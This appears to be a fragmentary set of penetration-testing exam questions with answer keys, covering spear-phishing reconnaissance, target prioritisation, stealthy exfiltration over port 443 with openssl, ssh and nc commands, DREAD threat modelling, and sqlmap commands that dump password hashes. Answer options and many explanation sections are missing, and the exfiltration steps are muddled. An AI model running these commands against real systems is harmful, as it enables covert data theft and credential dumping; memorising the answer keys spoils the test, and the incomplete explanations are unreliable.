A penetration tester is conducting reconnaissance for an upcoming assessment of a large corporate client. The client authorized spear phishing in the rules of engagement. Which of the following should the tester do first when developing the phishing campaign?
Correct Answer:
C
When developing a phishing campaign, the tester should first use social media to gather information about the targets.
✑ Social Media:
✑ Process:
✑ Other Options:
Pentest References:
✑ Spear Phishing: A targeted phishing attack aimed at specific individuals, using personal information to increase the credibility of the email.
✑ OSINT (Open Source Intelligence): Leveraging publicly available information to gather intelligence on targets, including through social media.
By starting with social media, the penetration tester can collect detailed and personalized information about the targets, which is essential for creating an effective spear phishing campaign.
=================
A penetration tester needs to evaluate the order in which the next systems will be selected for testing. Given the following output:
Which of the following targets should the tester select next?
Correct Answer:
A
✑ Evaluation Criteria:
✑ Analysis:
✑ Selection Justification:
Pentest References:
✑ Risk Prioritization: Balancing between severity (CVSS) and exploitability (EPSS) is crucial for effective vulnerability management.
✑ Risk Assessment: Evaluating both the impact and the likelihood of exploitation helps in making informed decisions about testing priorities.
By selecting the fileserver, the penetration tester focuses on a target that is highly likely to be exploited, addressing the most immediate risk based on the given scores.
Top of Form
Bottom of Form
A penetration tester discovers data to stage and exfiltrate. The client has authorized movement to the tester's attacking hosts only. Which of the following would be most appropriate to avoid alerting the SOC?
Correct Answer:
D
AES-256 (Advanced Encryption Standard with a 256-bit key) is a symmetric encryption algorithm widely used for securing data. Sending data over TCP port 443, which is typically used for HTTPS, helps to avoid detection by network monitoring systems as it blends with regular secure web traffic.
✑ Encrypting Data with AES-256:
Step-by-Step Explanationopenssl enc -aes-256-cbc -salt -in plaintext.txt -out encrypted.bin
-k secretkey
✑ Setting Up a Secure Tunnel:
ssh -L 443:targetserver:443 user@intermediatehost
✑ Transferring Data Over the Tunnel: cat encrypted.bin | nc targetserver 443
✑ Benefits of Using AES-256 and Port 443:
✑ Real-World Example:
✑ References from Pentesting Literature: References:
✑ Penetration Testing - A Hands-on Introduction to Hacking
✑ HTB Official Writeups
=================
A penetration tester needs to help create a threat model of a custom application. Which of the following is the most likely framework the tester will use?
Correct Answer:
D
The DREAD model is a risk assessment framework used to evaluate and prioritize the security risks of an application. It stands for Damage potential, Reproducibility, Exploitability, Affected users, and Discoverability.
✑ Understanding DREAD:
✑ Usage in Threat Modeling:
✑ Process:
✑ References from Pentesting Literature: Step-by-Step ExplanationReferences:
✑ Penetration Testing - A Hands-on Introduction to Hacking
✑ HTB Official Writeups
=================
During an assessment, a penetration tester exploits an SQLi vulnerability. Which of the following commands would allow the penetration tester to enumerate password hashes?
Correct Answer:
B
To enumerate password hashes using an SQL injection vulnerability, the penetration tester needs to extract specific columns from the database that typically contain password hashes. The --dump command in sqlmap is used to dump the contents of the specified database table. Here??s a breakdown of the options:
✑ Option A: sqlmap -u www.example.com/?id=1 --search -T user
✑ Option B: sqlmap -u www.example.com/?id=1 --dump -D accounts -T users -C cred
✑ Option C: sqlmap -u www.example.com/?id=1 --tables -D accounts
✑ Option D: sqlmap -u www.example.com/?id=1 --schema --current-user --current-db
References from Pentest:
✑ Writeup HTB: Demonstrates using sqlmap to dump data from specific tables to retrieve sensitive information, including password hashes.
✑ Luke HTB: Shows the process of exploiting SQL injection to extract user credentials and hashes by dumping specific columns from the database.
=================
